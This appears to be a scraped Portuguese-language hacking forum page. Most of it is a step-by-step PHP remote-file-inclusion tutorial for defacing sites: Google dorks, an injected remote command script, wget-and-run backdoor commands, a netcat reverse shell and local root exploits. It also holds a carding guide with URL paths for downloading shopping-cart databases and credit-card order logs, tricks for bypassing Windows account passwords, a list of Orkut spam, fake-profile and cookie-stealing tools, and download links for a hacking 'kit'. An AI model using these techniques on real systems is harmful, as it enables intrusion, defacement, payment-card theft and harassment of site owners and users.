Comments

Já que muita gente pede ajuda sobre php injection, resolvi fazer

um tutorial de simples entendimento pra facilitar a vida da galera new.

Esta falha consiste em usuários incluirem scripts no codigo php da

vitima e este ser executado. Quando corretamente utilizado, que é o que

explicarei nesse tutorial, o intruso pode setar comandos ao servidor.

Boa parte do processo pode ser feito pelo próprio browser (IE,

mozilla, netscape...).

Tentarei explicar como procura, explora e corrige o bug. Espero

ser util para todos ;)

Obs1.: Este tutorial foi feito para explicar uma das maneiras utilizadas

por pessoas para desfigurar sites mas pode ser utlizado para outros fins.

Vai da cabeça de cada um :P

Obs2.: No final, terão urls com os programas citados.

2) O que é o que

Vitima : Site que você irá explorar a falha de php.

String : Arquivos no site suceptiveis ao ataque.

Cmd : Script em PHP que nos possibilita digitar

comandos a serem incluidos no php.

Backdoor : Abre portas no sistema para conexão remota 'sem

autenticação'.

Connect Back : Abre uma porta especifica para conexao entre seu

pc e a vitima.

Exploit : Programa que explora certa falha num sistema.

Há vários tipos de Exploits. Aqui, iremos

tratar apenas com Local Root Exploits. (exploram

falhas localmente que levam usuários comuns a

acesso root - super-usuário -)

Shell : É um programa interpretador de comandos que

permite ao usuário iteragir com o sistema

operacional através de comandos digitados.

Telnet : Utilizaremos para conexões remotas.

Firewall : É uma barreira inteligente entre uma rede local

e a Internet, através da qual só passa tráfego

autorizado. Este tráfego é examinado pelo

firewall em tempo real e a seleção é feita de

acordo com a regra."o que não foi expressamente

permitido, é proibido"

root : Super-usuário. É o admin... tem acesso total ao

sistema.

------------------- No browser

3) Strings

Há várias strings disponíveis. Neste tutorial, irei utilizar para

exemplos uma bem simples que é " index.php?page= ". Em anexo, no final,

várias outras :P

4) Sintaxe

Ex.:

www.site.com /arquivo.php?data= http://cmd/cmd.gif?&cmd= ls

^ ^ ^ ^

Vitima String CmD comando unix

P.S.: Sem os espaços.

5) Procurando site vulnerável.

Uma excelente ferramente para os kiddies, sem dúvida, é o google.

Há várias maneiras de fazer buscas por ele, dentre elas:

Obs.: A palavra 'word' q irei citar aqui é qualquer coisa que você esteja

procurando no sistema de busca.

word : Busca por sites q contenham a 'word' em qualquer

lugar da pagina.

allinurl: : Sites que contenham na url a word citada. Ex:

www.site.com/forum/word.php?id=0 .

allintitle: : Restringe sua pesquisa ao título da página.

intitle: : Parecido com o de cima, para maiores

esclarecimentos no final do tuto.

inanchor: : Busca nos links dentro co corpo dos sites.

href="PROCURA AQUI DENTRO">

site: : Procura sites de um determinado domínio. Ex:

site:br <- procura sites .br

link: : Sites que contenham links para um outro

determinado site. Ex: link:www.securityfocus.com

filetype: : Filtra por extensões de arquivos. Ex:

filetype:php <- procura apenas urls .php

Essas dicas devem ser uteis não apenas na busca de sites

vulneraveis, mas também nas buscas comuns para você ;)

Utilizando a string "index.php?page=" para sites .gov -->

allinurl:index.php?page= site:gov

Fácil..

.

Você também pode usar um scanner pra tornar o processo mais

eficiente. kieger (membro do r00t_System grouP) codou um em perl:

Procura com o sistema do google, testa e imprime os vulneraveis num

arquivo. Código no final do tutorial.

6) Utilizando a CmD

6.1) Incluindo

Cmd = http://rootsystem.100free.com/cmd/cse.gif?&cmd=

(coded by Crash from datacha0s group.)

No resultado, insira a cmd na string. Ex:

www.site.com/index.php?page=http://rootsystem.100free.com/cmd/cs

e.gif?&cmd=

Não tem mistério.

6.2) A Cmd

datacha0s - PHP Command/Safemode Exploit

System Information

sysname: --> Sistema operacional rodando.

nodename: --> Nome local.

release: --> Versão do kernel.

Script Current User: --> Usuário pelo qual o script está sendo executado.

PHP Version: --> Versão do php da máquina

User Info: --> Informação do user (uid, euid, gid).

Current Path: --> Pasta atual que você está no server.

Server IP: --> Ip do servidor.

Web Server: --> Informações sobre o servidor.

[*] Command Mode Run

Command Stdout

(( aqui ficarao os resultados dos comandos ))

(( inseridos na cmd ))

Obs.: O script varia de cmd a cmd. Este é apenas um exemplo.

7) Ganhando acesso a shell

Para os próximos passos, você precisa estar na shell

(interpretador de comandos) da máquina. Para isto, explicarei duas

maneiras de tornar isto possível: Backdoor e Connect Back.

7.1) Rodando backdoor no server para conexão remota

Para rodar um backdoor, basta fazer um upload, escolher

permissões, e executá-lo.

Comando: cd /var/tmp;wget www.site.onde.está.o.backdoor.com/backd

oor;chmod 777 backdoor;./backdoor

cd /var/tmp -> Faz a operação nesta pasta, por ser comum a

todos os usuários e devido às suas permissões.

/tmp tb serve :)

wget www.(...)/backdoor -> Copia o backdoor a partir de uma url para o

site. Quando wget não funcionar, tente outros

comandos. Sintaxes:

wget www.site.com/arquivo

lynx -source www.site.com/arquivo > arquivo

curl -o arquivo www.site.com/arquivo

GET www.site.com/arquivo > arquivo

(...)

Após feito isso, aparecerá a seguinte mensagem:

Daemon Working...

pid = XXXXX

Isto significa que o backdoor está rodando.

Agora, basta conectar-se à shell. Como?

No Win: Iniciar -> Executar -> telnet www.site.com porta

Onde o www.site.com recebe o nome ou ip do site que você rodou o

backdoor e porta é a porta que o backdoor está trabalhando.

Se aparecer no telnet bash-2.05b$ ou algo parecido, é porque

funcionou! E você tem acesso à shell na máquina!

Se demorar um tempo e não cair na shell, confira o nome/ip do

server.. se estiver correto, ele está rodando Firewall. E agora?

simples, Connect Back. :P

7.2) Connect Back

Método muito eficiente para ganhar shell numa máquina. Ganha shell

reversamente.

Windows: Baixe o netcat para windows e no Prompt do MSDOS (na

pasta que o nc se encontra), digite: nc -vv -l -p 15 , onde 15

pode ser escolhido de acordo com sua preferência. Esta porta será a que

realizará a conexão.

Agora, voltando para o browser, na cmd digite o seguinte comando:

cd /var/tmp;wget www.site.do.dc.com/dc;chmod 777 dc;./dc IP porta

cd /var/tmp -> Mesmo que para backdoor.

wget www.site.do.dc.com/dc -> | | | | , mas é logico, com o

endereço da dc.

./dc IP porta -> onde IP é o SEU IP e porta é a porta

que você escolheu no netcat.

Feito isso, se ocorrer tudo certo, aparecerá como resultado:

Connect Back Backdoor

[*] Dumping Arguments

[*] Resolving Host Name

[*] Connecting...

[*] Spawning Shell

[*] Detached

Isto significa que você se conectou na shell! ;) Agora, vá para o

MSDOS e vamos para o próximo passo.

Se aparecer

Connect Back Backdoor

[*] Dumping Arguments

[*] Resolving Host Name

[*] Connecting...

[-] Unable to Connect

confira os dados (seu ip, porta, netcat, etc). Se insistir, sua

rede não aceita este tipo de conexão. Tente outras portas (como 80, 22,

15, etc).

---------------------------------- Na Shelll

8) Comandos básicos

Eu ia passar direto nessa parte, mas sei que muitos não conhecem

os comandos unix. Então vamos conhecer alguns:

ls -> Lista arquivos. Pode ser combinado com -a (mostra

ocultos) e -l (mostra detalhadamente). Ex: ls -la

(mostra detalhadamente os arquivos, inclusive ocultos).

uname -a -> Mostra informações do sistema, como versão do kernel,

nome, e outras coisas uteis.

id -> Mostra sua id.
w -> Lista os usuários logados no momento.
cp -> Copia arquivos. Sintaxe: cp arquivo /destino/
mv -> Move arquivos. Sintexe: mv arquivo /destino/
rm -> Remove arquivos. Se combinado com -rf , remove todos

os arquivos setados, inclusive pastas

mkdir -> Cria diretorio
rmdir -> Exclui diretorio
find -> Procura por arquivos/pastas. Ex: " find /etc -name
httpd.conf " procura pelo httpd.conf na pasta /etc
pwd -> Mostra em que pasta você está localizado
cat -> Exibe o conteúdo de um arquivo na tela
head -> Exibe linhas do início do arquivo
tail -> || || || final do arquivo
ctrl+c -> Sai/killa um programa
ctrl+r -> Busca comando digitado no history do bash
ps -auxw -> Lista todos os processos do sistema
netstat -na -> Status da conexão
kill -9 -> Mata processo. Sintaxe: kill -9 PID DO PROCESSO
kill -HUP -> Reinicia processo. Sintaxe: kill -HUP ID DO PROCESSO
pico -> Editor de texto. Sintaxe: pico arquivo
vi -> | | vi arquivo

Salvando resultados em arquivos

comando > /arquivo/onde/será/armazenado

Ex: ls /etc > /tmp/s.txt salva todo o resultado da listagem de

/etc no arquivo /tmp/s.txt

Adicionando linhas em arquivos

echo ' linha ' >> /arquivo/onde/será/incluido

Descompactando arquivos (os mais comuns)

.tar -> tar xvf arquivo.tar
.tar.gz -> tar zxvf arquivo.tar.gz
.tar.bz2 -> tar jxvf arquivo.tar.bz2
.zip -> unzip arquivo.zip

Compactando arquivos (os mais comuns)

.tar -> tar cvf destino.tar ARQUIVO
.tar.gz -> tar cvf destino.tar ARQUIVO | gzip destino.tar
.tar.bz2 -> tar cvf destino.tar ARQUIVO | bzip2 destino.tar

9) Ganhando acesso root

Para ganhar acesso root localmente numa máquina, vai depender

muito. Você precisa de um exploit local e o sistema deve estar vulnerável.

Simples, basta baixar, escolher as permissões e executar.. assim

como você faz com o backdoor.. mas isto você faz na shell.

Os mais comuns no momento são mremap , brk e kmod para kernel

abaixo de 2.4.24

Se tudo ocorrer corretamente rootando a máquina, ao digitar o

comando "id" você verá

bash-2.05b# id

uid=0(root) gid=0(root)

Pronto! Você é root! Divirta-se ;)

Comments

- A Primeira maneira de se fazer isto, é a seguinte:

Quando ligar o computador fique apertando F8 ate aparecer a tela onde tera as opcoes de inicializacao, escolha como modo seguro, entao vai aparecer a conta do administrador ou ira entrar direto nela, agora e so ir no painel de controle e desativar a senha da conta bloqueada, MASSSS existe um porem, se a conta do administrador tambem estiver bloqueada nao vai ter jeito pq ele vai pedir a senha. Ai se todas contas disponiveis estiverem com senha e vc nao souber nenhuma delas vai ter que ser pelos programas listados, mas se souber uma das senhas ha outro jeito que e a 2ª maneira.

- A Segunda maneira de se fazer isto, é a seguinte:

Entre em qualquer conta, va em iniciar/ executar e digite "control userpasswords2" logo ira aparecer uma telinha onde vc pode deletar e mudar a senha de todas as contas existentes.

Comments

[Indíce]

[1] Bug AspCart5
[2] Bug CandyPress
[3] Bug Cart Hassan
[4] Bug Cart32
[5] Bug ccbill
[6] Bug Cyber office
[7] Bug Ezshopper 2.0 & 3.0
[8] Bug Fpdb
[9] Bug MidiCart
[10] Bug Perlshop.cgi
[11] Bug ProductCart
[12] Bug Quikstore
[13] Bug SoftCard
[14] BugWebStore

-----------------
[1] AspCart5[*]
-----------------
Bem aki estou outra vez, apanhar uma grande seca a escrever um tutorial, mas enfim é por uma boa causa. Então vamos la, mais conhecimento ai para o pessoal que quer se iniciar no carding..

Primeiro vc só tem de ir ao google e digitar:

allinurl:/backend/ no qual vão aparecer uma lista de sites.

Depois é só mudar a url:
Exemplo:
www.fhp.pt/backend/xxx.asp ---> URL Normal
www.fhp.pt/aspcart5.mdb ---> URL Modificada

Bem como viram é uma maneira muito fácil mas eficaz...

------------------
[2] CandyPress[*]
------------------
Primeiramente va até ao google e digite: allinurl:/candypress/ e ira aparecer os possiveis sites com bugs:

Exemplo:
www.fhp.pt/candypress/xxx/xxx.asp
Se aparecer uns sites parecidos com isto e so mudar assim como os exemplos abaixo:

www.fhp.pt/store.mdb
www.fhp.pt/storefront.mdb
www.fhp.pt/fpdb/storefront.mdb
www.fhp.pt/fpdb/store.mdb

Agora se aparecer uns sites tipo isto:
www.fhp.pt/xxx/candypress/xxx.asp
E so mudar a url como os exemplos abaixo:
www.fhp.pt/xxx/store.mdb
www.fhp.pt/xxx/storefront.mdb
www.fhp.pt/xxx/fpdb/storefront.mdb
www.fhp.pt/xxx/fpdb/store.mdb

[3] Cart Hassan[*]
-------------------
Esta falha permite vc ver o lugar onde estão os cc.

Primeiramente va ao google e digite allinurl:Shop.pl/page=
Agore vc só tem de trocar o que vier depois page= por shop.cfg isto parace um bocado confuso mas olhe para o exemplo:
www.fhp.pt/shop.pl/page=shop.cfg acho que ja percebeu, entao que tenha uma boa caça
---------------
[4] Cart32[*]
---------------
Primeiramente va ate ao google e digite allinurl:cart32.exe e serão exibidos uma lista de sites.
Depois é só mudar as urls como se segue nos exemplos baixo:

Exemplo:www.fhp.pt/cgi-bin/cart32/cart32page-orders.txt
www.fhp.pt/cgi-bin/cart32.ini
www.fhp.pt/cgi-bin/cart32/cart32page-output.txt
www.fhp.pt/cgi-bin/cart32.exe/cart32clientlist
www.fhp.pt/cgi-bin/cart32.exe/error
www.fhp.pt/scripts/cart32/cart32page-orders.txt
www.fhp.pt/scripts/cart32/cart32page-output.txt
www.fhp.pt/scripts/cart32.ini
www.fhp.pt/scripts/cart32.exe/error
www.fhp.pt/scripts/cart32.exe/cart32clientlist
---------------
[5] ccbill[*]
---------------
Primeiro tens de ir ao google e digitar allinurl:/ccbill/ e aparecera uma lista de sites, nos quais vc so tera de modificar a url como o meu exemplo.

exemplo:

www.fhp.pt/ccbill/
www.fhp.pt/ccbill/secure.order.log
www.fhp.pt/ccbill.log
www.fhp.pt/ccbill/secure/currenty.log
www.fhp.pt/currenty.log
--------------------
[6] Cyber office[*]
--------------------
Este bug permite vc fazer o download da database
Para isso tem de ir ao google e digitar allinurl:/shopping_cart/view_cart.asp

A database fica no directorio /_private/ e chama se Shopping_cart.mdb.
Por isso o site ficava assim www.fhp.pt/_private/Shopping_cart.mdb
Vc tb pode procurar no google por allinurl:/shopping_cart/

[7] Ezshopper 2.0 & 3.0[*]
---------------------------
Primeiramente va ao google e digite allinurl:loadpage.cgi.
Agora e so substituir as urls dos sites que apareceram como demonstra o exemplo em baixo referido:

Exemplo:
Ezshopper v2.0
www.fhp.pt/cgi-bin/ezshopper2/loadpage.cgi?id+/ URL Normal
http://www.fhp.pt/cgi-bin/ezshopper2...subdirectorio/ URL MUDADA
http://www.fhp.pt/cgi-bin/ezshopper3...r_id=id&file=/ UrL Normal
http://www.fhp.pt/cgi-bin/ezshopper3...subdirectorio/ URL MUdADA
------------
[8] Fpdb[*]
------------
Primeiramente va ate ao google e digite allinurl:mall/lobby.htm
Vc ira encontrar urls como estes exemplos:

Exemplo:
www.fhp.pt/mall/lobby.htm
www.fhp.pt/shoponline/mall/lobby.htm

Exemplo de como ficam as urls modificadas:
www.fhp.pt/fpdb/shop.mdb
www.fhp.pt/shoponline/fpdb.mdb
----------------
[9] MidiCart[*]
----------------
Para variar vamos ao google e digite allinurl: meny2.asp e vai aparecer uma lista de sites.
Agora e so mudar a urls..

Exemplo:
www.fhp.pt/meny2.asp
www.fhp.pt/midicart.mdb
www.fhp.pt/shop/meny2.asp
www.fhp.pt/shop/midicart.mdb
---------------------
[10] Perlshop.cgi[*]
---------------------
Primeiramente va ao google e digite allinurl:Perlshop.cgi
O que vc ta procurando são estes directorios:
/temp_customers/
/temp_orders/
/orders/

Exemplo:
www.fhp.pt/cgi-bin/perlshop/temp_orders/
www.fhp.pt/cgi-bin/perlshop/temp_customers/
Isto pode lhe fornecer informa?oes interessante do site...
--------------------
[11] ProductCart[*]
--------------------
Vou agora falar de um bug um pouco conhecido que é o productcart.
As versões bugadas são a 1.0 e 2.0
Na instalação de default,o arquivo de dados do carrinho de produto e localizado em /productcart/database/Eipc.mdb
Que pode ser acessado facilmente por qualquer ataque remoto.
Exemplo:
www.fhp.pt/productcart/database/EIPC.mdb
Pronto é tudo que vc pode obter acesso ao banco de dados
------------------
[12] Quikstore[*]
------------------
Primeiramente e so ir ao google ( para variar ) e pesquise allinurl:quikstore.cgi
Agora é so mudar os "sites" por estas urls como amostra nos exemplos:

www.fhp.pt/cgi-bin/log_files/access.log
www.fhp.pt/cgi-bin/log_files/error.log
www.fhp.pt/cgi-bin/orders/
www.fhp.pt/cgi-bin/orders/1001.1.log
www.fhp.pt/cgi-bin/database/
www.fhp.pt/cgi-bin/cb/
www.fhp.pt/cgi-bin/
http://www.fhp.pt/cgi-bin/quikstore.....html&cart_id=
http://www.fhp.pt/cgi-bin/quikstore....0html&cart_id=
http://www.fhp.pt/cgi-bin/quikstore....0html&cart_id=
http://www.fhp.pt/cgi-bin/quikstore....ohtml&cart_id=
-----------------
[13] Softcard[*]
-----------------
Primeiramente vai ate ao google e digite allinurl:softcart.exe
O que aparecerá são mts sites e vc so tem de procurar urls como este pequeno exemplo:

Exemplo:
www.fhp.pt/cgi-bin/orders/*.olf
www.fhp.pt/cgi-bin/pw/storemgr.pw
-----------------
[14] WebStore[*]
-----------------
Bem primeiramente vai ate ao google e digita allinurl:web_store.cgi e aparecera uma lista de sites:
Nas quais somente vc ira mudar a url como no exemplo abaixo referido.

Exemplo:
www.fhp.pt/admin_files/order.log

É isso ai

Comments

Comments

Chameleon – (Criptografa e descriptografa HEX e Base64)

Cyber Eraser – (Apaga recadoss)

Cyber Flood Depoimentos – (Flooda depoimentos)

Cyber Flood Scraps – (Flooda Scraps)

Cyber Make Fake – (Cria profiles em massa)

Cookie Monster – (Captura cookies,vai com tutorial juntoe)

Envie Alegria – (Envia scraps para todos seus amigos)

Find Uid – (Captura Uids)

Floodmachine – (Melhor programa para floodar scraps)

Formatador Orkut – (Formata seus scraps)

Free Orkut Toolbar – (Barra de ferramentas multi-função)

Google Talk – (Mensageiro instantâneo do Orkut)

Jim's Fake Tools - (Crie fakes em massa e possui a função de ressucitalo se o Orkut deletar)

Loginkut – (Loga automaticamente em seu perfil com tempo determinando para se manter sempre no topo)

Lost Soul Flooder – (Flooda scraps)

Make Fake 1.0 – (Cria profiles em massa)

Make Fake 1.5 – (Cria profiles em massa)

Mass add Temporario– (Add pessoas de determinadas comunidades em massa)

Mass Add - (Add pessoas de determinadas comunidades em massa - versão atualizada)

Mass Flood Depoimentos – (Flooda depoimentos)

Mass Flood Scraps 1.0 – (Flooda scraps)

Mass Flood Scraps 1.5 – (Flooda scraps

Meetul Profile Maker – (Cria profiles em massa)

No Spam – (Bloqueia scraps spam no Orkut)

Orkut detetetive – (Gerenciador de profiles)

Orkut Clear Testimonial – (Apaga depoimentos)

Orkut Community Manager – (Gerenciador de comunidades)

Orkut Flooding – (Flooda scraps,depoimentos e vídeos)

Orkut Plus – (Gerenciador de profiles)

Orkut Spam Tools – (Flooda comunidades)

Orkut Mailer – (Envia Scraps ou depoimentos para todos seus amigos)

Orkut Cute – (Envia scraps para todos seus amigos)

Pending Members – (Aceita os membros pendentes em suas comunidades)

Popeye’s Super Flooder Beta 2.0 – (Flooda scraps e depoimentos)

Popeye’s Super Flooder Beta 3.0 – (Flooda scraps e depoimentos)

Profile Counter – (Gerenciador de profiles)

Sar Profile Maker – (Cria profiles em massa)

Scrapboy – (Transforme o Orkut em um mensageiro instantâneo)

Sony Clean Testimonial – (Apaga depoimentos)

Sony Friends Orkut 1.5 – (Envia scraps e depoimentos para todos seus amigos)

Sony Friends Orkut 1.6 – (Envia scraps e depoimentos para todos seus amigos)

Sony Friends Orkut 2.3.0.0 - (Envia scraps e depoimentos para todos versão atualizada)

Sony Flood Scrap – (Flooda scraps)

Scraps Profile Community – (Envia scraps para todos de uma cmm)

Scrap Sender – (Envia scraps para todos seus amigos)

Toc Toc – (Envia scraps para todos seus amigos)

Torkutter – (Gerenciador de Profiles)

Upador de Profiles – (Upa seus profiles)

Comments

1 http://rapidshare.com/files/13911984/kit.01.part01.by.riskblack.rar
2 http://rapidshare.com/files/13636729/kit.01.part02.by.riskblack.rar
3 http://rapidshare.com/files/13612665/kit.01.part03.by.riskblack.rar
4 http://rapidshare.com/files/13609353/kit.01.part04.by.riskblack.rar
5 http://rapidshare.com/files/13606362/kit.01.by.riskblack.part05.rar
6 http://rapidshare.com/files/13603617/kit.01.part06.by.riskblack.rar
7 http://rapidshare.com/files/13525250/kit.01.part07.by.riskblack.rar
8 http://rapidshare.com/files/13509817/kit.01.part08.by.riskblack.rar
9 http://rapidshare.com/files/13501771/kit.01.part09.by.riskblack.rar
10 http://rapidshare.com/files/13483653/kit.01.part10.by.riskblack.rar

Comments

Playstation 2:
http://nsx2.emulation64.com/files/downloads/nsx2-0.08.1-win32.zip/

Snes:
http://www.lezin.pop.com.br/centraldownloads/Zsnes1.36.exe/

Nintendo 64:
http://www.smiff.clara.net/emulators/pj64/pj64_1_5.exe/

Game boy Color:
http://prdownloads.sourceforge.net/vba/VisualBoyAdvance-1.7.2.zip/

Game boy Advance:
http://prdownloads.sourceforge.net/vba/VisualBoyAdvance-1.7.2.zip/

Mega Drive:
http://baixaki.ig.com.br/site/dwnld4559.htm/

Saturno:
http://rapidshare.com/files/25176881/yabause-0.8.0-win.zip/

Game Gear:
http://n64-gba-snes-roms-rox.discovirtual.uol.com.br/disco_virtual/roxdownload/dl/Fusion.rar/

Game Cube:
http://www.dolphin-emu.com/downloads/r4-dolphin-1.02/Dolphin_v102.zip/

Dolphin:
http://www.dolphin-emu.com/downloads/r4-dolphin-1.02/Dolphin_v102.zip/

Comments

http://rapidshare.com/files/46260725/Install_programa.rar

Video aula :

http://rapidshare.com/files/46261620/Video_Aula.rar

Imagens :

http://rapidshare.com/files/46272964/Imagen_do_MSN_hacker.rar

Comments

Comments

Comments

Comments

Comments

Comments

Comments

Comments

Comments

Comments

Comments